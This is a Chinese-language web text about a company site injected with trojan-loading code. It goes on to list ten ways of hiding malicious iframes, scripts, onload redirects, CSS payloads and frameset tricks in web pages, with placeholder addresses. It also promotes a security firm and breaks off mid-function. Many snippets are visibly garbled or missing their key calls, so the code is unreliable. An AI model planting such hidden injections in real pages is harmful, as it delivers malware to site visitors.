文档介绍:公司网站被挂马
所有页面都被加上了不明字符串,连后台的数据资料也是。上网查了查,发现些内容...应该是下面提到的js文件挂马,分析了那个js文件,其实就是利用js做的框架挂马。
唉,早说过现在的做法很悬的了...
木马的存在形态有如下几种:
一:框架挂马
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首先将以下代码 
("<iframe width='0' height='0' src='地址'></iframe>"); 
, 
则JS挂马代码为 
<script language=javascript src=></script>
有条件的朋友建议找专业的Sine安全小组解决网站挂马。官方站点
三:js变形加密
<SCRIPT language="" src=></script> 
 
四:body挂马
<body onload="='地址';"></body>
五:隐蔽挂马
= + '\r\n<iframe src="'">'">/"></iframe>';
六:css中挂马
body { 
background-image: url('javascript:("<script src=></script>")')}
七:JAJA挂马
<SCRIPT language=javascript> 
("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
</script>
八:图片伪装
<html> 
<iframe src="网马地址" height=0 width=0></iframe> 
<img src="图片地址"></center> 
</html>
九:伪装调用:
<frameset rows="444,0" cols="*"> 
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> 
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> 
</frameset>
十:高级欺骗
<a href="接地址,显示这个地址指向木马地址)" onMouseOver="(); return true;"> 页面要显示的内容</a> 
<SCRIPT Language="JavaScript"> 
function
_com () 
{ 
var url="网马地